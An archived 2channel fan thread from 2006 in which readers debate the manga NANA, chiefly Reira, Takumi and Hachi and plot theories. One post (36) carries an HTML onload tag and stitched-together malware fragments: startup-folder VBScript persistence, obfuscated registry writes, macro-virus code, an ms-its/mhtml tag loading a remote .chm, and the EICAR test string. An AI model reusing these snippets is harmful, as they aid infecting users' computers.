5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【NANA】矢沢あい98巻【天ない】

1 :花と名無しさん:2006/12/26(火) 16:45:10 ID:j6HAc11F0
CookieにてNANA連載中の、矢沢あいの作品について語るスレです。

作品の性質上、特定のキャラ叩きが起こりやすくなっています。
議論のループを避ける為にも、
前スレと補助サイトには目を通してからの参加をお願いします。

・sage進行です。メール欄にsageと書き込んで発言しましょう。
・荒らし・煽り・私怨による叩き禁止。構った貴方も煽りです。
・鵜材自分語り、自分語り予備軍的な書き込みは完全放置かスルー推奨です。

避難所:http://jbbs.shitaraba.com/comic/942/nana.html

よくある質問・過去ログ・関連サイト等>>2-20あたり。

前スレ 【NANA】矢沢あい97巻【下弦の月】
http://comic6.2ch.net/test/read.cgi/gcomic/1163490728/l50

2 :花と名無しさん:2006/12/26(火) 16:46:31 ID:j6HAc11F0
●ネタバレは発売日(原則毎月26日)の正午から。
●何かこのスレ、肌に合わないなあ。避難スレ立てちゃダメ?
少女漫画板には、一作家一スレの原則があります。したらばに逝け
http://jbbs.shitaraba.com/comic/942/

●コレ分りません!教えて下さい!(>(エ)<)
●下弦の月の最終回、どこが書き足されてるんですか?
●ジャクソンホールってどうなんですか?
●十巻の作者のことばの現実世界の大事件ってどういう意味?
●ロマンティックageって何?
●aitaiって何?

知ってるが(以下略


3 :花と名無しさん:2006/12/26(火) 16:48:06 ID:j6HAc11F0
■NANA2映画公式■
ttp://www.nana2-movie.com/

■監督■ 大谷健太郎 
大崎 ナナ=中島 美嘉 / 小松 奈々=市川 由衣/寺島 伸夫=成宮 寛貴/本城 蓮=姜 暢雄
一ノ瀬 巧=玉山 鉄二 /岡崎 真一=本郷奏多/ヤス=丸山智己/レイラ=伊藤由奈   
ナオキ=水谷百輔 /早乙女淳子=熊世あんな /高倉京助=高山猛久


NANA2〜その2・観ている方が恥ずかしくなる糞映画編〜
http://tv8.2ch.net/test/read.cgi/cinema/1165902712/l50



■アニメNANA公式■
ttp://www.s-nana.com/index.html
【放送スケジュール】
  日テレ系全国放送 毎週水曜日 23:55〜

NANA. 11
http://anime.2ch.net/test/read.cgi/anime/1163776055/l50

4 :花と名無しさん:2006/12/26(火) 16:58:32 ID:???0
『ロマンティックageるよ』橋本潮
おいでファンタジー
好きさミステリー
君の若さ 隠さないで
不思議したくて 冒険したくて
誰もみんな ウズウズしてる
大人のフリして あきらめちゃ
奇跡の謎など 解けないよ
もっとワイルドに
もっとたくましく 生きてごらん
ロマンティックageるよ
ロマンティックageるよ
ホントの勇気 みせてくれたら
ロマンティックageるよ
ロマンティックageるよ
トキメク胸に
キラキラ光った夢を ageるよ


5 :花と名無しさん:2006/12/26(火) 16:59:39 ID:???0
いつかワンダフル
きっとビューティフル
人のジャングル 迷いこんで
スリルしたくて 幸せしたくて
何故かみんな ソワソワしてる
思ったとおりに 叫ばなきゃ
願いは空まで 届かない
もっとセクシーに
もっと美しく 生きてごらん
ロマンティックageるよ
ロマンティックageるよ
ホントの涙 見せてくれたら
ロマンティックageるよ
ロマンティックageるよ
淋しい心 やさしく包んで 愛をageるよ
ロマンティックageるよ
ロマンティックageるよ
ホントの勇気 みせてくれたら
ロマンティックageるよ
ロマンティックageるよ
トキメク胸に
キラキラ光った夢を ageるよ
**********************参考******
#http://iridvoice.hp.infoseek.co.jp/song/romantic.mp3
#http://www10.plala.or.jp/karuq/anime/doragon/dragonball.swf
AA集
http://blue.ribbon.to/~dragon/AA.html
http://blue.ribbon.to/~dragon/AA2.html

6 :花と名無しさん:2006/12/26(火) 17:00:33 ID:???0
           ,∩.、,、,..,、,、,、、..,∩_    /i
         ;'`;、、●.:、:, :,.●`゙:.:゙`''':,'.´ -‐i
         '、;: ...: ;.. ( _●_):..;;...:: ;.;;.::‐'゙ ゜ ̄ テンプレはここまでクマー
          `"゙' ''`゙ |∪|´゙' ゙`´´´
               ヽノ

7 :花と名無しさん:2006/12/26(火) 17:00:48 ID:HCuUBIvg0
           ,..-‐ ´ ̄ ''ー-.__
         /:::::::::::::::::::::::::::::::::::::>⌒ヽ
          /::::::::::::::::::::::::::::::::::!:/ 弋__ノ
       ./::::::::::::::::::::::::::::::::::::::l
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ヽ
      ゝ________ノ
       ! ∠.._;'____\   |
      ,!イ く二>,.、 <二>`\.、ヽ.
     /'´レ--‐'ノ. `ー---- 、 |\ ヽ、
    \  `l  (!"      Jfヽ!  `''-;ゝ 
      `‐、jヽ ヾニニ>   ゙イ" }_,,. ‐''´  私からのプレゼントだ
         `´\  ー   / ,ィ_}
.          |_ `ー ''´ _」'
        _,.| ~||「  ̄ 人|、._
  ,r==;"´  ヽ ミ|||彡   / ` ー`==、-、
. ///,イ  ___ ヽ|||_,,. ‐''´___  | | | |ヽ

ttp://vegetation.o0o0.jp/pochi/upload.html
jyuuyon23291.zip
パス utaware



8 :花と名無しさん:2006/12/26(火) 17:02:23 ID:???O
>>1

次スレは>>970とか書いとかなくていいの?

9 :花と名無しさん:2006/12/26(火) 18:49:29 ID:???0
NANA死ぬの?

10 :花と名無しさん:2006/12/26(火) 18:55:22 ID:???0
通りすがりの大学生(20歳童貞)と運命の出会いを果たして幸せな家庭を築くよ


11 :花と名無しさん:2006/12/26(火) 19:06:52 ID:???0
そんなNANA嫌だw
ハチならそれでもいいけど

12 :花と名無しさん:2006/12/26(火) 19:35:15 ID:???0
そんなラストだったら矢沢を神と認定するよw

13 :花と名無しさん:2006/12/26(火) 19:42:49 ID:???0
やっぱりNANA死亡だったら神だよね

14 :花と名無しさん:2006/12/26(火) 20:01:36 ID:???0
えっ

15 :花と名無しさん:2006/12/26(火) 20:06:45 ID:???0
NANAは、17巻で死ry

16 :花と名無しさん:2006/12/26(火) 20:40:45 ID:???O
ナナ「ハチ・・今までありがとう・・」
ハチ「ナナー!!」

とか?ナイナイ

17 :花と名無しさん:2006/12/26(火) 20:51:55 ID:???O
ナナは外国に行って髪伸ばして色変えて、より薄幸の美少女になって、でも倉田には見つけられちゃうの?
そして見つけたのに何で奴は隠しているんだろう。

最近16巻まで一気に読んだんでよく分からないんだけど、都築舞(偽美里)は
源さんとどういう関係?孫か娘なんだろうけど。

いろいろ伏線張っているんだろうけど、破綻なく終わってくれればいいなあ。

18 :花と名無しさん:2006/12/26(火) 20:53:02 ID:x+KJTCAyO
美里の家の前にいたキツネ顔はサーチの一員だっけ?
登場人物多すぎて混乱
最初、フツーに兄貴かと思った

19 :花と名無しさん:2006/12/26(火) 20:56:00 ID:???O
キタローじゃないの?

20 :花と名無しさん:2006/12/26(火) 21:25:40 ID:???0
空広かっこええ

21 :花と名無しさん:2006/12/26(火) 22:03:26 ID:???O
読解力ないなww
本当に読んだのかよ

22 :花と名無しさん:2006/12/26(火) 22:35:58 ID:???0
シンちゃん「成長したくないから食べない」ってリョーコさんに対しての
義理?みたいなもんなのかな?
レイラが未だにタクミに未練あるのも意外だったし、なんかキャラが
何考えてるのかわからなくなってきたよ…

23 :花と名無しさん:2006/12/26(火) 22:55:47 ID:???0
>>22
キャラが何考えてるのかわからないのは、
「人間の内面はその時によってコロコロ変化する」という意味でのリアルさを追求してるのか、
それともただ矢沢の構想が破綻してるだけなのか、だんだんわからなくなってきた。

とりあえずタクミは「レイラへの恋愛感情は無い」ってのを他人は勿論、自分にも無理に言い聞かせていたってことなのだろう。

24 :花と名無しさん:2006/12/26(火) 23:53:02 ID:???0
なんか本当になんだかな〜〜〜って感じだ・・・

25 :花と名無しさん:2006/12/27(水) 00:41:56 ID:???0
>>23
>>「レイラへの恋愛感情は無い」ってのを他人は勿論、自分にも無理に言い聞かせていた

え〜!これだったらタクミが一番最低な結末になりそう。
だったら最初からレイラにしとけよ、みたいな。ハチ以上にみんなを振り回してさ。
でも未来でハチとはまだ続いてたよね。皐も無邪気な感じだったし。

26 :花と名無しさん:2006/12/27(水) 00:57:58 ID:+zrTkz7sO
皐が失踪したナナの子供って可能性はないかな?はちは流産とかで

27 :花と名無しさん:2006/12/27(水) 01:01:52 ID:nTw/sY/JO
皐はナナとハチの子です

28 :花と名無しさん:2006/12/27(水) 01:05:50 ID:???0
やっぱりね^^

29 :花と名無しさん:2006/12/27(水) 01:21:23 ID:???0
>>23
>タクミは「レイラへの恋愛感情は無い」ってのを他人は勿論、自分にも無理に言い聞かせていたってことなのだろう。
いや、それは違うっしょ。
タクミにレイラへの恋愛感情はないよ。
だからこそ本当はしたくないのに冷たくしてきたんでしょ?
期待させないように。
でもレイラのことは本当に大事で幸せになって欲しいと思ってるから、
うっかり手なんか握って眠ってしまったって事だと思う。

30 :花と名無しさん:2006/12/27(水) 01:47:31 ID:???O
タクミのレイラに対する思い(家族愛?)も深いよね。
タクミはハチに対して恋愛感情って言い切れるものではないし。

極論だけど、
恋愛感情(=ハチ)と家族愛(=レイラ)どっちを選ぶか迫られたら
家族を取る人も多いしね。

まぁそのうち皐が生まれるから
ハチに対しても『家族愛』になるんだろうけど。
(もう既になってるか?)

恋愛感情>家族愛って訳じゃないから難しい。


31 :花と名無しさん:2006/12/27(水) 02:00:11 ID:???O
タクミに「恋愛感情」ってあるのかなという気もしてきた。
そしてレイラには家族愛以上のものを感じている気がする。
唯一の宝、みたいな

32 :花と名無しさん:2006/12/27(水) 02:17:00 ID:???O
レイラもタクミもお互いがそんな感じだよね〜

もうレイラのエピソードいらねーからナナとハチの話すすめてほしい

33 :花と名無しさん:2006/12/27(水) 02:18:10 ID:???O
ナナ母失踪か

ナナに会ったら全部ナナのせいにして
あんたなんか産まなきゃよかったとか言いそう

34 :花と名無しさん:2006/12/27(水) 03:23:45 ID:58ubvpZFO
グアムでナナと母が会いそう。ナナ母グアムに逃避してそう。
美雨かわいい。

35 :花と名無しさん:2006/12/27(水) 03:42:57 ID:???O
ナナが失踪するであろう海とはグアムなんだろうか
ナナが一人になるのはその時しかなさそうだよね

36 :<body onload=window()>:2006/12/27(水) 06:54:58 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


37 :花と名無しさん:2006/12/27(水) 10:54:03 ID:???O
番外編でTAKUMIがあるなら、タクミの心情が解るわけでしょ?
そこで実はレイラに恋愛感情を持ってるけどトラネスを続ける為に捨ててる…
とか出てきちゃったら物凄く嫌だなぁ

38 :花と名無しさん:2006/12/27(水) 10:55:47 ID:???0
>>35
それだったらやだなぁw南の島の海で失踪なんて陽気すぎ。
でも話進めるためにとっとと事が起こって欲しい気もする。

39 :花と名無しさん:2006/12/27(水) 11:00:09 ID:???0
そもそもタクミの妙なハチに対する固執が無ければ
ここまで話はこじれないのにな・・・
見ていてどうにもハチに恋愛感情を持ってるとは思えないし、
タクミは結婚するって言ってからも浮気してるし、
トラネスのタクミとしても、タクミが結婚して利益を得るなんて事無いし・・・
まぁ、どっちにしても妊娠した時点でノブがハチと子供まで
養っていける程度の稼ぎが無いから無理なんだろうけど。

ていうかレイラの話はいいからホントさっさとナナの話進めて欲しい・・・
長文スマソ。

40 :花と名無しさん:2006/12/27(水) 11:17:31 ID:???O
ハチは普通に好きなんだと思うけど。タクミは。
ただ誘惑に弱くてフラフラ浮気性なだけで。
ハチと似たもの同士じゃんw夢見がちなとこは似てないけど

41 :花と名無しさん:2006/12/27(水) 11:44:41 ID:???0
>>40
8〜9巻でのレンやナオキとのやりとりからするとハチのことは好きだと思う。
ただタクミにとってはその他大勢の女との遊びも大事なんだろうね。
浮気してる女優に結婚は本気だって言うくらいだし遊びはあくまでも遊び?

42 :花と名無しさん:2006/12/27(水) 12:32:54 ID:HzOCNzJUO
NANA1巻から2巻辺りの白黒な感じが好きだったんだけど最近はトーンが多くて画面がごちゃごちゃして見える気がする

43 :花と名無しさん:2006/12/27(水) 12:38:27 ID:???O
今回不評なレイラとタクミの話だけど、
自分はレイラとタクミはくっついて欲しいという少数派w
でもNANAは深刻に見せて実は大した事ない展開多いから、
2人の関係の変化もあんまり期待はしていない…

44 :花と名無しさん:2006/12/27(水) 13:52:27 ID:???O
レイラの何が不評かさっぱり分からん
レンに『(こんな自分を)抱きしめちゃダメ』って言ってるし
しかもシンとのことや、シンよりトラネスを選んだ黒い自分
のこともきちんと話してる。



45 :花と名無しさん:2006/12/27(水) 13:58:14 ID:???O
レイラとタクミくっついてもいいと思う
くっついてどっか行ってくれ

46 :花と名無しさん:2006/12/27(水) 14:28:50 ID:???0
>>44
それを言うところがわざとらしく感じるんじゃない?
こんな黒い自分でも気にかけてもらえる、愛されてる、とも取れる。
自分もはっきりとした理由は分からないけど何故かレイラ苦手。

47 :花と名無しさん:2006/12/27(水) 14:41:21 ID:???O
>>46それが理由ならただの言いがかりだよW
あの言葉を言わなかったら、ただレンに気をもたせた嫌な女だし
言ったら言ったでいちいち口に出すなってW
そういう人は、レイラの言動が嫌いなんじゃなくて
レイラって存在が嫌なだけだよね。
結局何してもレイラだから気にくわない。


48 :花と名無しさん:2006/12/27(水) 15:01:56 ID:GUyyNaRP0
タクミはハチが妊娠しなかったら、そしてノブの影がチラつかなかったらプロポーズなんかしなかったとオモ。
つまり恋愛感情っていってもそれくらい。
そもそも女に本気で惚れるような男?
仕事が大事なタクミは歌姫のレイラが大事なだけだろう。



49 :花と名無しさん:2006/12/27(水) 15:17:48 ID:???0
>>48
基本的には同意なんだが・・・
たまにタクミのレイラを見る目にそれ以上のものを感じたりするからさ。
たんに作者が思わせぶりなのか表現力がないだけなのかもしらんが。

50 :花と名無しさん:2006/12/27(水) 15:20:22 ID:oPWSTJTrO
同じ色の痛みをゆるしあって違う色の過ちをせめた同じ色の明かりをともしあって違う色のとびらを隠した今君のために色づいた花がさく

51 :花と名無しさん:2006/12/27(水) 15:22:54 ID:???O
>47
それは言ったらハチアンチも同じだよ
ちなみに私はレイラ好きだけど、両ヒロインの相手と絡んだあたりから
ある程度叩かれても仕方ないと諦めてる

52 :花と名無しさん:2006/12/27(水) 15:26:00 ID:???O
今月号のグアムに行く件はわざわざ最後にパスポートどこだっけ?
ってセリフがあるからパスポートを持っている→
その後色々あった挙げ句失踪してイギリスで発見への
ささやかな伏線じゃね?知らんが。

53 :花と名無しさん :2006/12/27(水) 15:29:59 ID:???0
レイラってナナほど歌が好きって感じがしない。
ナナは仕事以外でも歌が好きでカラオケに行きたがったり
何もかも嫌になった未来でもイギリスで歌を歌っているのに
レイラはトラネスの歌姫でいないとタクミに捨てられるって強迫観念があるような・・・。
何年後かはレイラは歌じゃないほかのことでトラネスから自立する可能性もあるかな。



54 :花と名無しさん:2006/12/27(水) 15:34:28 ID:???0
今のレイラ見てると歌以外の道は厳しそうだが

55 :花と名無しさん:2006/12/27(水) 15:36:15 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
NANA2〜その2・観ている方が恥ずかしくなる糞映画編〜 [映画作品・人]

おまいら・・・

56 :花と名無しさん:2006/12/27(水) 15:48:37 ID:???O
>>52
あ、そうか、そうかもね
ナナの失踪する海は雪が降るんだよね、忘れてた

57 :花と名無しさん:2006/12/27(水) 16:11:18 ID:???0
>>53
今月号読むとそんな感じだね、レイラは。
もちろん歌も大好きだろうがタクミがいなければ多分続けてなかった。
独り立ちはもはや無理だろう…。

58 :花と名無しさん:2006/12/27(水) 16:14:00 ID:???O
>>53何話か忘れたけど
通りすがりの一般人も同じようなこと言ってたね。
レイラみたいになまじ天才肌だと努力を認めてもらえず
ナナみたいに絞り出す声の方が共感される。
レイラが腹筋割れてても、ナナが禁煙できなくても。

59 :花と名無しさん:2006/12/27(水) 16:47:17 ID:lEMJEJY/O
まぁ取りあえずレイラは居るだけで周りに迷惑をかける疫病神ってことで

60 :花と名無しさん:2006/12/27(水) 16:52:27 ID:???O
レイラがブスだったら叩かれてないと思う

61 :花と名無し:2006/12/27(水) 17:00:49 ID:???O
いあ
ブスだったらもっとヒドイと思うが

62 :花と名無しさん:2006/12/27(水) 17:03:06 ID:???0
腹筋割れてるのはすごいよなあ

63 :花と名無しさん :2006/12/27(水) 17:09:17 ID:???0
上原美鈴は二回も逃げてしまったことになるんだね。
ナナはもちろん美里からも恨まれることになって・・・
もう帰れないだろうな。
倉田はすぐ(生きていれば)美鈴や美里の居場所をおさえると思う。



64 :花と名無しさん:2006/12/27(水) 17:18:21 ID:???O
>>62陰で努力してる描写、が完全にないよね。

65 :花と名無しさん:2006/12/27(水) 17:23:05 ID:???0
>>64
そんな描写いらんだろ。ヤスの「レイラの腹筋は割れてる」発言は絶対だ。

66 :花と名無しさん:2006/12/27(水) 17:35:35 ID:???0
でも鍛えなくても腹筋割れてるヤツは腹筋割れてるよな

67 :花と名無しさん:2006/12/27(水) 18:00:22 ID:???0
出だしのハチがうざいうざい

68 :花と名無しさん:2006/12/27(水) 19:00:43 ID:???0
みゅーがかわいかった

69 :花と名無しさん:2006/12/27(水) 19:09:45 ID:???0
NANA ファースト、コンビニ出てるので
久しぶりに頭の方を読んでみたが
ハチの馬鹿っぷりの描写が見事で面白かった。
矢沢、やっぱりうまいなー、色々。

70 :花と名無しさん:2006/12/27(水) 19:20:37 ID:???O
まだ雑誌読めてないんだけど、
巧からレイラの手を握ってたの?

71 :花と名無しさん:2006/12/27(水) 20:06:45 ID:???O
はい

72 :花と名無しさん:2006/12/27(水) 20:17:20 ID:???O
ナナ今月号のネタバレってどこにあるのかな?

73 :花と名無しさん:2006/12/27(水) 20:36:15 ID:???O
>>72
http://jbbs.livedoor.jp/bbs/i.cgi/comic/942/


74 :花と名無しさん:2006/12/27(水) 20:52:16 ID:???O
>>73
d!
これって美鈴さんも地元の海かどっかで自殺すんじゃね…?
それがナナは本当に自分が否定されたみたいでショックで失踪しちゃうとか…

75 :花と名無しさん:2006/12/27(水) 21:36:50 ID:???O
たかがマンガだと分かっているが、
なんか鬱になってくるマンガだよ

76 :花と名無しさん:2006/12/27(水) 22:22:27 ID:???0
タクミとレイラがくっついたら、ご近所でユースケと歩がくっついたみたいで嫌かも

77 :花と名無しさん:2006/12/27(水) 23:12:37 ID:???0
タクミが浮気したのはレイラ似の女だろ
やっぱどっかレイラに恋愛感情あるんじゃないか

開始が2000年だから連載期間7年で2007年で終わるんじゃないかな
今月号で未来のハチが会いに行ってもいいよねって言ってたし

78 :花と名無しさん:2006/12/27(水) 23:39:33 ID:???O
タクミは誘われたから浮気したんじゃなかった?
タクミは誘われたからすぐ寝そうだから、あの浮気に意味はない気がする

79 :花と名無しさん:2006/12/27(水) 23:42:29 ID:???0
>>77
澄香がレイラに似てるって言ってたのはハチだけだし、
しかも顔じゃなくて体型とかバランスが似てるって言ってただけだよ。
凌子さんぐらい誰が見ても似てるって言うならまだタクミ→レイラも考えられるけど、
スタイルの良さが似てるから恋愛感情あるって言われてもねぇ。

80 :花と名無しさん:2006/12/27(水) 23:45:48 ID:???O
他のキャラもそうだけど、レイラて世界が狭いよね
基本タクミの顔色伺ってるし、もっと自立すればいーのに
愛情と寄生は違うとゆーか

81 :花と名無しさん:2006/12/27(水) 23:46:22 ID:???0
意味ないならわざわざ八にレイラに似てない?なんて言わせることもないと思うんだけど
大事な妹以外にも少しは気あるんじゃないかな

82 :花と名無しさん:2006/12/28(木) 00:06:01 ID:???O
タクミがレイラに手だしたとして、それでもタクミは浮気しそうだし、
一回手だしたらあのレイラの性格ではずっと依存してきそうだし、四六時中レイラに縛られることなりそう。
それにいちいち言動とかで落ち込まれて歌に支障でるのが嫌だったから、
手出さなかったのかもね。だからレイラの恋心には気付いてたけど一貫してとぼけてたのかも?

83 :花と名無しさん:2006/12/28(木) 00:32:30 ID:???0
ナナとレンは未来でくっつきそう
見所はハチタクミレイラがどうなるかぐらいかな

84 :花と名無しさん:2006/12/28(木) 00:54:16 ID:???O
タクミレイラは見たくないなあ
ハチファンてわけじゃないが、不幸を嘆いてた女の一人勝ちに見える

85 :花と名無しさん:2006/12/28(木) 00:58:04 ID:???O
>>82ハチ「タクミはそこまで考えてないよきっと」

86 :花と名無しさん:2006/12/28(木) 01:06:09 ID:???O
レイラうざいんでさっさとタクミとでも誰とでもいなくなってほしい。

男より仕事取ったくせに未練がましく電話するなよ。んで自分だけ悲劇の主人公ぶるなよ。

87 :花と名無しさん:2006/12/28(木) 01:07:02 ID:GFG7iWRaO
アンチレイラすげぇな

88 :花と名無しさん:2006/12/28(木) 01:07:03 ID:???0
歩は嫌いだったなあ
矢沢も歩は好きじゃなかったみたいだからレイラも好きじゃないけど敢えてああやってるんじゃないだろうか

89 :花と名無しさん:2006/12/28(木) 01:18:28 ID:???O
もし、タクミがレイラと結ばれたとしたら、何故、未来にハチと皐が住む家に来るのかわからない。
子供に対して義理(?)に近いものしかないタクミなら養育費だけおくってきそうだけど…

90 :花と名無しさん:2006/12/28(木) 01:19:21 ID:???O
×未来に
○未来で

91 :花と名無しさん:2006/12/28(木) 01:20:49 ID:???O
ここの住人がレンよりタクミが好きだということはよく分かった。

92 :花と名無しさん:2006/12/28(木) 01:28:14 ID:???0
自分はタクミ嫌いだしレンの方が好きだけど

93 :花と名無しさん:2006/12/28(木) 01:38:24 ID:6icKnsde0
>>89自分もそう思う。
多分タクミとレイラの関係は今のままだと思うよ。
未来でもトラネスは健在だと思ふ。

94 :花と名無しさん:2006/12/28(木) 01:51:49 ID:???O
未来でハチが着付けに詳しかった理由がわかったね
その着付けの先生は未来でどうなってるんだろ

95 :花と名無しさん:2006/12/28(木) 05:38:31 ID:???O
レイラは自分が一番可哀相で悲劇のど真ん中にいると思ってそう。
自分のせいで他人を悲劇に巻き込んでるのに気付いて現実見て欲しい
ハチもそうだったが成長したからね。
未来のレイラは誰とくっつくかより精神面気になる

96 :花と名無しさん:2006/12/28(木) 07:18:29 ID:???0
レイラに限らないけどめそめそ周りに甘えてばかりってのはずるいよね

97 :花と名無しさん:2006/12/28(木) 08:27:06 ID:NgxyeElqO
頭大丈夫ですか?( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

98 :花と名無しさん:2006/12/28(木) 09:11:57 ID:???O
レイラは自分が恵まれてるって状態に気付いてないよね。
でも昔から美人で人気あって周りから大事にされてきたんだから仕方ないのかもね

99 :花と名無しさん:2006/12/28(木) 10:38:40 ID:???O
想う人から想われず、なんて不幸はそこら中に散らばってるもんだからね
いつまでもそれ一本で嘆かれ続けるといい加減にしろぃ!とスリッパで頭叩きたくなるわな

100 :花と名無しさん:2006/12/28(木) 10:45:14 ID:QfRjmuaGO
100 (´・ω・`)

101 :花と名無しさん:2006/12/28(木) 10:55:32 ID:???0
>>98
自分が恵まれてることはちゃんと分かってるんじゃ?
自分には才能があって、バンドも上手く行ってて、スタッフもいい人ばっかり。それは自覚してるでしょ。
レイラは色恋沙汰ごときで恵まれた環境に適応できない自分にイラついてるようにも見える。

102 :花と名無しさん:2006/12/28(木) 11:02:14 ID:???O
平凡女ハチ目線でレイラ嫌う人大杉
リアルでも恵まれた美人をひがんでそうだ

103 :花と名無しさん:2006/12/28(木) 11:27:34 ID:???O
そりゃブスに生まれたのはその人のせいじゃないんだから、
それで嫌な思いしてたら美人を僻むのはよくあることじゃないの?
漫画でもよくあるじゃん。
まぁこの漫画では無いけど

104 :花と名無しさん:2006/12/28(木) 11:30:05 ID:???O
想う人から想われなくても、その人が幸せであればいいとか思うような優しい人間?
てか心の広い人間になりたいけどなかなかそうゆう風にはいかないってことを言いたいんじゃね
矢沢は。

105 :花と名無しさん:2006/12/28(木) 12:18:30 ID:???O
問題は色恋沙汰でフラフラしてるレイラじゃなくて、それを許してマンセーしてる男達だろう。
特にレン、レイラを眩しい目で見てる場合じゃねえだろゴルァ

106 :花と名無しさん:2006/12/28(木) 12:34:36 ID:???0
>男より仕事取ったくせに未練がましく電話するなよ。

これは同感。さんざん概出だろうけど
自分から会わないって言ったのにそれで自分から電話したりするのは
自分勝手に思えた。



107 :花と名無しさん:2006/12/28(木) 12:58:55 ID:???0
レイラは気はいいけど頭がよくない子ってイメージだ
常に自分のことで精一杯で正しく周りを見られないというか、
間違った方向にばっかり気遣いするというか

108 :花と名無しさん:2006/12/28(木) 13:15:36 ID:???O
周りを冷静にみてるのってヤスぐらいしかいない気がする
タクミはただの冷血漢に見えるし

109 :花と名無しさん:2006/12/28(木) 13:28:04 ID:???O
2ちゃん見てたらレイラって人気ないんだな〜て感じだけど
本誌読んだら一般的には「健気で頑張ってる」て人気なんだね。
2ちゃんと一般の差て何なんだ!?

110 :花と名無しさん:2006/12/28(木) 13:32:47 ID:???0
自分としてはレイラ可哀相と思う以前にシンちゃん可哀相と思ったからなー

111 :花と名無しさん:2006/12/28(木) 13:37:47 ID:???O
>>109
ヒント:やらせ
ヒント:2chは大体毒舌批判

112 :花と名無しさん:2006/12/28(木) 13:39:02 ID:???O
今週は淳子と京介でてきたからよし

113 :花と名無しさん:2006/12/28(木) 13:41:48 ID:???0
>>109
無記名だからこその、容赦ない厳しい突っ込みや意見を知るか知らないかの差では?
NANAに限った事じゃないけど、自分で元々マンセーしてても、
他の人の批判を読んで「なるほど」って思ってしまう事もよくあるし。

114 :花と名無しさん:2006/12/28(木) 13:49:46 ID:???0
無記名+過疎板ってのは連投してる奴の意見が目立つだけ

115 :花と名無しさん:2006/12/28(木) 14:08:35 ID:???O
レイラを嫌いなやつがいようが好きなやつがいようが個人の主観だしスルーしとけばいんじゃね
NANAはあんなストーリーよく思い付くなーって感心するな
続きどうなるのか気になっちゃうし。引き込むのが上手いと思う

116 :花と名無しさん:2006/12/28(木) 14:58:09 ID:???O
全然関係ない話ですみませんが、私昔インディーズのパンクバンドが好きだった時期があります。
1番好きだったSA(えすえー)ってバンドのギターのナオキさん(COBRA→LAUGHIN'NOSE→DOG FIGHT→SA)が金髪のスパイキーヘアでなんとなくNAOKIとかぶるんですけど。
NAOKIはドラムで髪はツンツンに立ててはないんですが、作者はナオキさんの事知ってるのかなーと。

117 :花と名無しさん:2006/12/28(木) 15:25:52 ID:???O
とくにモデルとかいなそうだけど・・・
ナオキとか特にテキトーに考えたっぽいし

118 :花と名無しさん:2006/12/28(木) 16:08:22 ID:???0
レイラが馬鹿やったせいでタクミ結婚することにもなったしねえ。
そのことはレイラどう思ってるんだろう?

119 :花と名無しさん:2006/12/28(木) 16:29:19 ID:???O
当時はシンがいたから、結婚そのものにはあまり気にしてなかったみたいだけど、
今となってはどうかな

120 :花と名無しさん:2006/12/28(木) 16:39:05 ID:???O
レイラは別にハチのことは否定してないけど、
タクミが好きだから自分から離れていっちゃうのが寂しいんだと思う

121 :花と名無しさん:2006/12/28(木) 17:53:54 ID:LGOn+uMBO
レイラはタクミ好きなくせにシンとやってるとこがやだぁ

122 :花と名無しさん:2006/12/28(木) 18:04:16 ID:???O
作ってみました…
http://j.pic.to/71znf

123 :花と名無しさん:2006/12/28(木) 18:04:48 ID:???0
最初からずっとタクミタクミタクミ…で悩み続けてたんなら
ウザくなかったんだけどなあ>レイラ

124 :花と名無しさん:2006/12/28(木) 18:13:20 ID:???0
>>122
乙。
出来ればレンとスクープされそうになった時に様子見で待機してた時のお団子ヘアも載せて欲しかった。
あの時のレイラは思い切り童顔でまるでハチのようだった。

125 :花と名無しさん:2006/12/28(木) 19:19:44 ID:???0
番外編って五十音順?

126 :花と名無しさん:2006/12/28(木) 19:52:52 ID:???O
偶然だけどね

127 :花と名無しさん:2006/12/28(木) 20:15:42 ID:???0
つうか出番の少ないレンの番外編
やれよ。

128 :花と名無しさん:2006/12/28(木) 20:56:18 ID:???0
淳子で

129 :花と名無しさん:2006/12/28(木) 21:46:17 ID:???0
レンが出番少ない??何で??

130 :花と名無しさん:2006/12/28(木) 22:27:08 ID:???0
http://annex.s-manga.net/gokinjyo/

131 :花と名無しさん:2006/12/28(木) 22:31:00 ID:???0
本人は嫌がってるけど言動行動を見てるとやっぱりお姫様体質だよね、レイラ
レンもタクミも特別視だし。

ナオキが3人平等に大切な仲間だと思ってくれてたらまだ救いがあるなぁ(見てる側としては)

132 :花と名無しさん:2006/12/28(木) 22:32:29 ID:???0
>>130
みかこカワユス

133 :花と名無しさん:2006/12/28(木) 22:48:32 ID:???0
ハチや他のキャラが当然の批判されてる時は出て来ないのに、
レイラが当然の批判されてる時だけ出てくる「アンチレイラすげえな」「レイラは
美人だから」とか混ぜっ返すレイラヲタが矢沢ヲタの中で最も痛くてキモい。

134 :花と名無しさん:2006/12/28(木) 23:00:12 ID:???0
>>133
レイラヲタ以外から見ても的ハズレな批判が多いことは確かだよ。

